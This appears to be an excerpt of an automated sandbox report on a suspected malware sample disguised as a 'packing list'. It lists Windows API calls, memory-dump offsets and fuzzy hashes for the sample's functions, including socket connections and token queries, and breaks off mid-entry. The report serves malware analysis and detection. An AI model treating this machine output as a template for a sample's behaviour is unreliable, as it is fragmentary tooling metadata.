                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: MessagePostSleep$RectWindow
                                                  • String ID:
                                                  • API String ID: 3382505437-0
                                                  • Opcode ID: 16f68ec1692621b90022ba2a9f83fb14390487f4e66a773ffdd6b8f65e6a5e23
                                                  • Instruction ID: de5bc170f22ad455426271d0937918e8cd02df877eeb4512b42eafaac35f01d1
                                                  • Opcode Fuzzy Hash: 16f68ec1692621b90022ba2a9f83fb14390487f4e66a773ffdd6b8f65e6a5e23
                                                  • Instruction Fuzzy Hash: 6A31DFB1A00219EBDF04CF68DD8DA9E3BB5EB04315F104269F925EB2D1D7B89994CB90
                                                  APIs
                                                  • IsWindowVisible.USER32(?), ref: 00B6DBD7
                                                  • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00B6DBF4
                                                  • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00B6DC2C
                                                  • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00B6DC52
                                                  • _wcsstr.LIBCMT ref: 00B6DC5C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                  • String ID:
                                                  • API String ID: 3902887630-0
                                                  • Opcode ID: c74130338ae07226b06059e2d856fb007eaa7f585085ca97e4664564b0ff6f4b
                                                  • Instruction ID: 4985ddc593586e25de084210e232ab5fb0d0f93412f4f8d4ef4e92a0036be0f6
                                                  • Opcode Fuzzy Hash: c74130338ae07226b06059e2d856fb007eaa7f585085ca97e4664564b0ff6f4b
                                                  • Instruction Fuzzy Hash: FC21F272B04204BBEB159B299C49E7B7BE8DF45760F1040B9F80ACA191EEA9C901D2A0
                                                  APIs
                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00B6BC90
                                                  • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00B6BCC2
                                                  • __itow.LIBCMT ref: 00B6BCDA
                                                  • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00B6BD00
                                                  • __itow.LIBCMT ref: 00B6BD11
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$__itow
                                                  • String ID:
                                                  • API String ID: 3379773720-0
                                                  • Opcode ID: 5b1d63a489b06561427ce9b8912358f51ac3192d99e9216915a6b1c66bd3bfc2
                                                  • Instruction ID: fd2857ec2bd628e81508f832210cb46bb1f221f0d2b95429ad1a85ad3953c35b
                                                  • Opcode Fuzzy Hash: 5b1d63a489b06561427ce9b8912358f51ac3192d99e9216915a6b1c66bd3bfc2
                                                  • Instruction Fuzzy Hash: 7621C6366006087BDB20AA658C86FDE7BF8EF59750F1014F4F906EB181EB74998587A1
                                                  APIs
                                                    • Part of subcall function 00B350E6: _wcsncpy.LIBCMT ref: 00B350FA
                                                  • GetFileAttributesW.KERNEL32(?,?,?,?,00B760C3), ref: 00B76369
                                                  • GetLastError.KERNEL32(?,?,?,00B760C3), ref: 00B76374
                                                  • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,00B760C3), ref: 00B76388
                                                  • _wcsrchr.LIBCMT ref: 00B763AA
                                                    • Part of subcall function 00B76318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,00B760C3), ref: 00B763E0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                                                  • String ID:
                                                  • API String ID: 3633006590-0
                                                  • Opcode ID: 57ef3c9510f4f35a278c78af01dc60f8fa19f65de49d48049e8784d9a529b3e8
                                                  • Instruction ID: 61b9b934b0cbec6559f3eca5c488c69599fb446a320abc204d00868c791fa513
                                                  • Opcode Fuzzy Hash: 57ef3c9510f4f35a278c78af01dc60f8fa19f65de49d48049e8784d9a529b3e8
                                                  • Instruction Fuzzy Hash: 6621F631504A158BDB15AB7C9C42FEA23ECEF15360F1184E6F469D3180EEA49A84CA59
                                                  APIs
                                                    • Part of subcall function 00B8A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 00B8A84E
                                                  • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00B88BD3
                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00B88BE2
                                                  • connect.WSOCK32(00000000,?,00000010), ref: 00B88BFE
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: ErrorLastconnectinet_addrsocket
                                                  • String ID:
                                                  • API String ID: 3701255441-0
                                                  • Opcode ID: 0d7761e1eb5081c4335faeaefc7101b38fd7e1764518c8975f4f1e3d4bbf1bfb
                                                  • Instruction ID: 5273b93b750ae935b127b39db5d5a0d786f4c2960681033db5c84b9051338f92
                                                  • Opcode Fuzzy Hash: 0d7761e1eb5081c4335faeaefc7101b38fd7e1764518c8975f4f1e3d4bbf1bfb
                                                  • Instruction Fuzzy Hash: 99219D312002159FDB10AF68CC85B7E77E9EF48720F14859DF916AB2A2DFB4AD018B61
                                                  APIs
                                                  • IsWindow.USER32(00000000), ref: 00B88441
                                                  • GetForegroundWindow.USER32 ref: 00B88458
                                                  • GetDC.USER32(00000000), ref: 00B88494
                                                  • GetPixel.GDI32(00000000,?,00000003), ref: 00B884A0
                                                  • ReleaseDC.USER32(00000000,00000003), ref: 00B884DB
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: Window$ForegroundPixelRelease
                                                  • String ID:
                                                  • API String ID: 4156661090-0
                                                  • Opcode ID: e575af928c7a5404f3eb60ed1e894deb45ccec7eb21ccf16d2e1c82e699851a2
                                                  • Instruction ID: c7dc6fd99b36f57a1bbda115d59c3796d175b86161b1a131092b801f95f5d12c
                                                  • Opcode Fuzzy Hash: e575af928c7a5404f3eb60ed1e894deb45ccec7eb21ccf16d2e1c82e699851a2
                                                  • Instruction Fuzzy Hash: F0215176A00204AFD710EFA5DD89AAEBBE5EF48301F1484B9E85A97351DF74ED00DB60
                                                  APIs
                                                  • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00B4AFE3
                                                  • SelectObject.GDI32(?,00000000), ref: 00B4AFF2
                                                  • BeginPath.GDI32(?), ref: 00B4B009
                                                  • SelectObject.GDI32(?,00000000), ref: 00B4B033
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: ObjectSelect$BeginCreatePath
                                                  • String ID:
                                                  • API String ID: 3225163088-0
                                                  • Opcode ID: c4bcbf6ee6ca2a91bdb8e7d190d3db4c9fe5e1b5de3b28f941c9906a226f9dbb
                                                  • Instruction ID: b22eb149aa5fd13141a2a2601c9769618c342a9fe7e4f973296d5505814369f2
                                                  • Opcode Fuzzy Hash: c4bcbf6ee6ca2a91bdb8e7d190d3db4c9fe5e1b5de3b28f941c9906a226f9dbb
                                                  • Instruction Fuzzy Hash: 4021A1B1800205FFDB10DF59EC44BBA7BA8F720356F144B5AE521E31A0DBB18945EB54
                                                  APIs
                                                  • __calloc_crt.LIBCMT ref: 00B521A9
                                                  • CreateThread.KERNEL32(?,?,00B522DF,00000000,?,?), ref: 00B521ED
                                                  • GetLastError.KERNEL32 ref: 00B521F7
                                                  • _free.LIBCMT ref: 00B52200
                                                  • __dosmaperr.LIBCMT ref: 00B5220B
                                                    • Part of subcall function 00B57C0E: __getptd_noexit.LIBCMT ref: 00B57C0E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                                  • String ID:
                                                  • API String ID: 2664167353-0
                                                  • Opcode ID: 41adff71cade0f0829345bcfd2b4c96f5cd9afa8ddb7b71aa7bcd0af22e7ba5a
                                                  • Instruction ID: 004ac90f6d7c0cc88621de26fed8432c3560bd11e66998379932e7b4fcdfd741
                                                  • Opcode Fuzzy Hash: 41adff71cade0f0829345bcfd2b4c96f5cd9afa8ddb7b71aa7bcd0af22e7ba5a
                                                  • Instruction Fuzzy Hash: 5E1148322057466FAB11AF64EC42F6B37D8EF06771B1000E9FD1487141EF72C8098AA0
                                                  APIs
                                                  • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00B6ABD7
                                                  • GetLastError.KERNEL32(?,00B6A69F,?,?,?), ref: 00B6ABE1
                                                  • GetProcessHeap.KERNEL32(00000008,?,?,00B6A69F,?,?,?), ref: 00B6ABF0
                                                  • HeapAlloc.KERNEL32(00000000,?,00B6A69F,?,?,?), ref: 00B6ABF7
                                                  • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00B6AC0E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                  • String ID:
                                                  • API String ID: 842720411-0
                                                  • Opcode ID: e9906a58b0adb16a31bd535a433fc3eb4f376d2fcd7621d95e312ab5143b8936
                                                  • Instruction ID: 545c423ec1baa9d960f31e13c687adaa5ac1209c2f25c1ad8eb037a5ef5c0114
                                                  • Opcode Fuzzy Hash: e9906a58b0adb16a31bd535a433fc3eb4f376d2fcd7621d95e312ab5143b8936
                                                  • Instruction Fuzzy Hash: 3C01F675200205BFDB104FA9DC48DAB3FADEF8A7557100569F946E3260EAB9DC40CE61
                                                  APIs
                                                  • CLSIDFromProgID.OLE32 ref: 00B69ADC
                                                  • ProgIDFromCLSID.OLE32(?,00000000), ref: 00B69AF7
                                                  • lstrcmpiW.KERNEL32(?,00000000), ref: 00B69B05
                                                  • CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00B69B15
                                                  • CLSIDFromString.OLE32(?,?), ref: 00B69B21
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: From$Prog$FreeStringTasklstrcmpi
                                                  • String ID:
                                                  • API String ID: 3897988419-0
                                                  • Opcode ID: 99f7804e22be1419e3f6e7c22971bdaa6033971055d78bcfc04491500cc92472
                                                  • Instruction ID: cacd0e13085698809b7d561d84b7607cfca844124e0471ad938fce950ee1a5d7
                                                  • Opcode Fuzzy Hash: 99f7804e22be1419e3f6e7c22971bdaa6033971055d78bcfc04491500cc92472
                                                  • Instruction Fuzzy Hash: CB01AD76600209BFDB104F68EC44BAABBFDEF48752F188064F905D3210EBB8DD019BA0
                                                  APIs
                                                  • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00B77A74
                                                  • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00B77A82
                                                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00B77A8A
                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00B77A94
                                                  • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00B77AD0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: PerformanceQuery$CounterSleep$Frequency
                                                  • String ID:
                                                  • API String ID: 2833360925-0
                                                  • Opcode ID: a507fe381b4155b9d9a385149019cfa236332a0bde2528fcbe4ff698da4ada84
                                                  • Instruction ID: e543909d559cb5c0a429dfcb863536fd10e92d6771e5d9b02e81b98fa1b27799
                                                  • Opcode Fuzzy Hash: a507fe381b4155b9d9a385149019cfa236332a0bde2528fcbe4ff698da4ada84
                                                  • Instruction Fuzzy Hash: F5011775C48619ABEF00AFA8DC88ADDBBB8FF08711F008595E516B2164EF749A50C7A1
                                                  APIs
                                                  • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00B6AADA
                                                  • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00B6AAE4
                                                  • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00B6AAF3
                                                  • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00B6AAFA
                                                  • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00B6AB10
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: HeapInformationToken$AllocErrorLastProcess
                                                  • String ID:
                                                  • API String ID: 44706859-0
                                                  • Opcode ID: e1282d173d52575baa4c4ffb08228a9457229bf3694253faa485a77a79a79777
                                                  • Instruction ID: 69eac5ef234233b91c42a82129c72867c2c79d1b1c75a9c287ef9f25eac42a9c
                                                  • Opcode Fuzzy Hash: e1282d173d52575baa4c4ffb08228a9457229bf3694253faa485a77a79a79777
                                                  • Instruction Fuzzy Hash: 89F04F712002096FEB111FA4EC88F673BEDFF45754F040169F941E7190DAA8DC018E61
                                                  APIs
                                                  • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00B6AA79
                                                  • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00B6AA83
                                                  • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00B6AA92
                                                  • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00B6AA99
                                                  • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00B6AAAF
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: HeapInformationToken$AllocErrorLastProcess
                                                  • String ID:
                                                  • API String ID: 44706859-0
                                                  • Opcode ID: 8ecf28dba5d8ead06cc4f43abbf54acf8baed9484ac0c4661c8900e1be3c9db3
                                                  • Instruction ID: 0beaf2f364e95e82eef1e8856a609dbcfd827be2ec5356a93a3fc5a81f27797a
                                                  • Opcode Fuzzy Hash: 8ecf28dba5d8ead06cc4f43abbf54acf8baed9484ac0c4661c8900e1be3c9db3
                                                  • Instruction Fuzzy Hash: 57F04F712002056FEB115FA4AC89E673BACFF49754F00056AF941E7190EAA8DC41CE61
                                                  APIs
                                                  • GetDlgItem.USER32(?,000003E9), ref: 00B6EC94
                                                  • GetWindowTextW.USER32(00000000,?,00000100), ref: 00B6ECAB
                                                  • MessageBeep.USER32(00000000), ref: 00B6ECC3
                                                  • KillTimer.USER32(?,0000040A), ref: 00B6ECDF
                                                  • EndDialog.USER32(?,00000001), ref: 00B6ECF9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                  • String ID:
                                                  • API String ID: 3741023627-0
                                                  • Opcode ID: 6a0562a9e89245e4e3387413731cc191736ada9ae7a0ea19d1bd57f3de227da8
                                                  • Instruction ID: e3fdcb13414e8a22e043183f00798c0c6ede5e1df787c868a1d3afdbf62625d3
                                                  • Opcode Fuzzy Hash: 6a0562a9e89245e4e3387413731cc191736ada9ae7a0ea19d1bd57f3de227da8
                                                  • Instruction Fuzzy Hash: 7E018134500705ABEB345B10DE9EB9677B8FF10B05F0006A9B597A64E0EFF8AA44CB40
                                                  APIs
                                                  • EndPath.GDI32(?), ref: 00B4B0BA
                                                  • StrokeAndFillPath.GDI32(?,?,00BAE680,00000000,?,?,?), ref: 00B4B0D6
                                                  • SelectObject.GDI32(?,00000000), ref: 00B4B0E9
                                                  • DeleteObject.GDI32 ref: 00B4B0FC
                                                  • StrokePath.GDI32(?), ref: 00B4B117
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: Path$ObjectStroke$DeleteFillSelect
                                                  • String ID:
                                                  • API String ID: 2625713937-0
                                                  • Opcode ID: a993bc7fe8d4bdfb5ebd2bec874c83d9bae7815315fe23bf047223ca48bedb12
                                                  • Instruction ID: c872c72b462226708792fb9789bd057e330f666832a118033af8f27e61b171d5
                                                  • Opcode Fuzzy Hash: a993bc7fe8d4bdfb5ebd2bec874c83d9bae7815315fe23bf047223ca48bedb12
                                                  • Instruction Fuzzy Hash: 64F01930004205EFCB21AF6DEC0DB643BA4EB10362F088B55E525D70F0DB758A56EF14
                                                  APIs
                                                  • CoInitialize.OLE32(00000000), ref: 00B7F2DA
                                                  • CoCreateInstance.OLE32(00BBDA7C,00000000,00000001,00BBD8EC,?), ref: 00B7F2F2
                                                  • CoUninitialize.OLE32 ref: 00B7F555
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: CreateInitializeInstanceUninitialize
                                                  • String ID: .lnk
                                                  • API String ID: 948891078-24824748
                                                  • Opcode ID: fbf85703e8fa54a077ba8d384e13905095c953117fec221833dc2cea7b3231b3
                                                  • Instruction ID: 26d704733c0f34d4196f29ea2989f3a99b04ad9374303a1403306f963247fdf4
                                                  • Opcode Fuzzy Hash: fbf85703e8fa54a077ba8d384e13905095c953117fec221833dc2cea7b3231b3
                                                  • Instruction Fuzzy Hash: 9CA11A71504201AFD300EFA4C881EAFB7ECEF98714F5049ADF55597192EB70EA49CBA2
                                                  APIs
                                                    • Part of subcall function 00B3660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00B353B1,?,?,00B361FF,?,00000000,00000001,00000000), ref: 00B3662F
                                                  • CoInitialize.OLE32(00000000), ref: 00B7E85D
                                                  • CoCreateInstance.OLE32(00BBDA7C,00000000,00000001,00BBD8EC,?), ref: 00B7E876
                                                  • CoUninitialize.OLE32 ref: 00B7E893
                                                    • Part of subcall function 00B3936C: __swprintf.LIBCMT ref: 00B393AB
